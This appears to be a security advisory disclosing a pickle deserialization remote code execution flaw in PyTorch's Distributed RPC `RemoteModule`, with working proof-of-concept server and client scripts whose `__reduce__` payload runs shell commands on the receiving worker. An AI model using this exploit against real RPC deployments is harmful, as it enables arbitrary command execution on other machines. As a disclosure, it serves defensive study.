**Distributed RPC Framework** `RemoteModule` **has a Deserialization RCE in [pytorch/pytorch](https://github.com/pytorch/pytorch)**
====================================================================================================================================
**Description**
===============
Credit: HRP Aftersnow gxh
The `RemoteModule` API of the **Distributed RPC Framework** in [pytorch/pytorch](https://github.com/pytorch/pytorch) is vulnerable to a deserialization RCE: a malicious peer in the RPC group can send a module object whose pickled payload executes arbitrary commands when the remote worker deserializes it.
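The root cause is the standard Python pickle behavior that the RPC layer relies on: an object can define `__reduce__` to control how it is reconstructed, and whatever callable it returns is invoked at deserialization time. The following standalone sketch (independent of PyTorch, using the harmless command `id` as an illustrative payload) shows the primitive the PoC below builds on.

```python
import pickle

class Payload:
    # __reduce__ tells pickle how to rebuild this object; the callable it
    # returns (os.system here) is invoked by pickle.loads on the receiving side
    def __reduce__(self):
        return (__import__("os").system, ("id",))

blob = pickle.dumps(Payload())   # what a sender would put on the wire
pickle.loads(blob)               # deserializing it runs `id` locally
```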
**Proof of Concept**
====================
Initialize the environment (replace `ens18` with the local network interface name):
export MASTER_ADDR=127.0.0.1
export MASTER_PORT=5000
export TP_SOCKET_IFNAME=ens18
export GLOO_SOCKET_IFNAME=ens18
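If preferred, the same variables can be set from Python before `init_rpc` is called; a minimal sketch mirroring the exports above (the interface name `ens18` is specific to this test machine):

```python
import os

# Mirrors the shell exports above; torch.distributed.rpc reads these
# when init_rpc() is later called with the default env:// rendezvous
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = "5000"
os.environ["TP_SOCKET_IFNAME"] = "ens18"    # TensorPipe transport interface
os.environ["GLOO_SOCKET_IFNAME"] = "ens18"  # Gloo backend interface
```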
The server code, `ser.py`:
import torch
import torch.distributed.rpc as rpc

def run_server():
    # Initialize server-side RPC
    rpc.init_rpc("server", rank=0, world_size=2)
    # Wait for the client's remote call, then shut down
    rpc.shutdown()

if __name__ == "__main__":
    run_server()
Run it with:
torchrun --nproc_per_node=1 --nnodes=2 --node_rank=0 --master_addr=127.0.0.1 --master_port=5000 ser.py
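If relying on environment variables is not desired, the rendezvous address can also be passed explicitly through the backend options; a minimal sketch of the same server, assuming the default TensorPipe backend:

```python
import torch.distributed.rpc as rpc

# Point the rendezvous at the master address directly instead of using env://
opts = rpc.TensorPipeRpcBackendOptions(init_method="tcp://127.0.0.1:5000")

rpc.init_rpc("server", rank=0, world_size=2, rpc_backend_options=opts)
rpc.shutdown()
```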
**POC**
=======
The client code, `cli.py`, which is also the exploit:
import torch
import torch.distributed.rpc as rpc
from torch.distributed.nn.api.remote_module import RemoteModule
import torch.nn as nn

# Define a simple neural network model MyModel
class MyModel(nn.Module):
    def __init__(self):
        super(MyModel, self).__init__()
        # A simple linear layer with input dimension 2 and output dimension 2
        self.fc = nn.Linear(2, 2)

    # __reduce__ controls how this object is pickled; it makes the
    # deserializing side execute an arbitrary command
    def __reduce__(self):
        return (__import__('os').system, ("id;ls",))

def run_client():
    # Initialize client-side RPC
    rpc.init_rpc("client", rank=1, world_size=2)
    # Create a remote module to run the model on the server side
    remote_model = RemoteModule(
        "server",    # Destination worker
        MyModel(),   # The malicious module, pickled and sent over RPC
        args=()      # Model initialization parameters
    )
    # Remotely call the model with an input tensor
    input_tensor = torch.tensor([1.0, 2.0])
    output = remote_model(input_tensor)
    print("Output from remote model:", output)
    # Shutdown RPC
    rpc.shutdown()

if __name__ == "__main__":
    run_client()
Run it with:
torchrun --nproc_per_node=1 --nnodes=2 --node_rank=1 --master_addr=127.0.0.1 --master_port=5000 cli.py
The output of the injected `id;ls` command can now be seen on the server:
![](https://images.seebug.org/1730365082950-w331s)
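Note that the command should already fire while the server deserializes the module during `RemoteModule` construction, before any forward call happens. A stripped-down client like the following sketch (same assumptions as `cli.py`, with the illustrative payload `id`) should therefore be enough to trigger it:

```python
import torch.distributed.rpc as rpc
from torch.distributed.nn.api.remote_module import RemoteModule
import torch.nn as nn

class Evil(nn.Module):
    # Pickling this object makes the deserializing side run the command
    def __reduce__(self):
        return (__import__("os").system, ("id",))

rpc.init_rpc("client", rank=1, world_size=2)
# Constructing the RemoteModule pickles Evil() and ships it to "server",
# where unpickling it executes the payload; no forward call is needed
RemoteModule("server", Evil(), args=())
rpc.shutdown()
```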
**Impact**
==========
An attacker who can join the RPC group can execute arbitrary commands on other workers through deserialization of attacker-controlled objects.